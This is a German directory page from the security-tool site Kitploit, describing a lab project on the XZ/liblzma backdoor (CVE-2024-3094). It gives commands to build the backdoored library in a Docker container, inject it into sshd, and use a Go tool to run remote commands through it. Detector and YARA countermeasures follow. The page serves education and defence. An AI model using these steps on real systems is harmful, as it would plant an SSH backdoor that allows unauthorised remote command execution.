Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-3094 — Eine XZ-Backdoor-Schwachstelle im Detail erklärt | Kitploit
Tools/GitHubGitHub/valeriot30/cve-2024-3094
SchwachstellenanalyseExploitationMalware-AnalyseBinäranalyseLernen & BildungLabs & Praxis
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

Eine XZ-Backdoor-Schwachstelle im Detail erklärt

Repository anzeigen
113vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ Cybersicherheitsprojekt: Analyse der XZ-Hintertür in liblzma

📄 Überblick

Dieses Projekt analysiert die vielbeachtete Hintertür, die in xz-utils (liblzma) entdeckt wurde und die Versionen 5.6.0 und 5.6.1 betrifft. Der in das Upstream-Build-System eingeschleuste Schadcode zielte auf die SSH-Authentifizierung ab, indem er zur Laufzeit die Interaktion von sshd mit der LZMA-Komprimierungsbibliothek veränderte.

⚠️ Dieses Projekt dient ausschließlich Bildungs- und Abwehrforschungszwecken.

Verwundbare Maschine

Klonen Sie dieses Repository

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Wechseln Sie in das Verzeichnis

root@kitploit:~
cd cve-2024-3094

Docker-Container starten

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

Besorgen Sie eine bösartige Version der Bibliothek

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # Die verwundbare Version ( funktioniert auch mit 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~
Tool herunterladen

Build-Ziel exportieren

root@kitploit:~
export RPM_ARCH=$(uname -m)

Die bösartige Bibliothek kompilieren

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

Die bösartige SO-Datei nach außen kopieren:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

Klonen Sie das Repository erneut innerhalb des Containers

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Patchen Sie die liblzma-Bibliothek mit einem benutzerdefinierten Schlüssel

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

Verknüpfen Sie die bösartige Bibliothek im System

root@kitploit:~
 sh cve-2024-3094/inject.sh

Führen Sie das mit der bösartigen Bibliothek verknüpfte sshd aus

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

Angreifermaschine

Klonen Sie dieses Repository

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Wechseln Sie in das Verzeichnis

root@kitploit:~
cd cve-2024-3094

Kompilieren Sie das GO-Tool

root@kitploit:~
go build

Verwenden Sie das Tool, indem Sie die IP-Adresse der verwundbaren Maschine und den auszuführenden Befehl angeben

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

Gegenmaßnahmen

Verwendung des Detektors

Führen Sie den Detektor aus

root@kitploit:~
sh detector.sh

Verwenden von Yara

Verwenden Sie die Yara-Abgleichregeln

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s